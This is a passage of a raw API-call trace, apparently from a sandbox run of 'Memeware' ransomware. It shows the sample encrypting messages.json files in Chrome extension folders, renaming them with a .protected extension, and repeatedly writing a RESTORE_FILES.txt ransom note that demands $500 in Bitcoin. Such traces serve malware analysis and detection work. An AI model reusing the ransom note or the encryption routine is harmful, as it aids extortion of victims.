(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.673] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.674] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.674] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.674] CloseHandle (hObject=0x164) returned 1 [0080.674] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.674] lstrcmpiW (lpString1="sk", lpString2="Windows") returned -1 [0080.674] lstrcmpiW (lpString1="sk", lpString2="Program Files") returned 1 [0080.674] lstrcmpiW (lpString1="sk", lpString2="Program Files (x86)") returned 1 [0080.674] lstrcmpiW (lpString1="sk", lpString2="$Recycle.bin") returned 1 [0080.674] lstrcmpiW (lpString1="sk", lpString2="System Volume Information") returned -1 [0080.674] wnsprintfW (in: 
pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk") returned 141 [0080.674] lstrcmpW (lpString1="sk", lpString2=".") returned 1 [0080.674] lstrcmpW (lpString1="sk", lpString2="..") returned 1 [0080.674] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\*") returned 143 [0080.674] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.675] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.675] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.675] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.675] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.675] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.675] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\.") returned 143 [0080.675] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.675] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.675] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.675] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.675] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.675] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.675] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.675] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\..") returned 144 [0080.675] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.675] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.676] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.676] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.676] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.676] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.676] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.676] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.676] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json") returned 155 [0080.676] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.676] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.676] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.676] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.676] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json") returned 155 [0080.676] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.676] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json") returned 155 [0080.677] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.677] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json") returned 155 [0080.677] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.677] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xc5, lpOverlapped=0x0) returned 1 [0080.677] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff3b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.678] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xc5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xc5, lpOverlapped=0x0) returned 1 [0080.678] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.678] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.678] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.678] CloseHandle (hObject=0x168) returned 1 [0080.678] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.protected") returned 165 [0080.678] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.protected")) returned 1 [0080.679] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.679] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.679] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\RESTORE_FILES.txt") returned 159 [0080.679] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.679] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.679] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.680] lstrlenA (lpString="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") returned 684 [0080.680] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.680] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.680] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.680] CloseHandle (hObject=0x164) returned 1 [0080.680] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.680] lstrcmpiW (lpString1="sl", lpString2="Windows") returned -1 [0080.680] lstrcmpiW (lpString1="sl", lpString2="Program Files") returned 1 [0080.680] lstrcmpiW (lpString1="sl", lpString2="Program Files (x86)") returned 1 [0080.681] lstrcmpiW (lpString1="sl", lpString2="$Recycle.bin") returned 1 [0080.681] lstrcmpiW (lpString1="sl", lpString2="System Volume Information") returned -1 [0080.681] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl") returned 141 [0080.681] lstrcmpW (lpString1="sl", lpString2=".") returned 1 [0080.681] lstrcmpW (lpString1="sl", lpString2="..") returned 1 [0080.681] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\*") returned 143 [0080.681] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.681] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.681] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.681] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.681] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.681] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.681] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\.") returned 143 [0080.681] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.681] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.681] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.681] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.681] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.681] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.681] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.681] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\..") returned 144 [0080.681] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.681] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.681] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.681] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.681] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.681] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.681] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.681] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.681] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json") 
returned 155 [0080.681] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.681] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.681] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.681] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.681] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.682] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json") returned 155 [0080.682] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.682] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json") returned 155 [0080.682] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.682] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json") returned 155 [0080.682] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.682] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xbe, lpOverlapped=0x0) returned 1 [0080.683] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff42, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.683] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xbe, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xbe, lpOverlapped=0x0) returned 1 [0080.683] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.683] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.683] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.683] CloseHandle (hObject=0x168) returned 1 [0080.683] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.protected") returned 165 [0080.683] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.protected")) returned 1 [0080.684] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.684] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.684] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\RESTORE_FILES.txt") returned 159 [0080.684] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.691] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.691] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.691] lstrlenA (lpString="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") returned 684 [0080.691] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.692] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.692] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
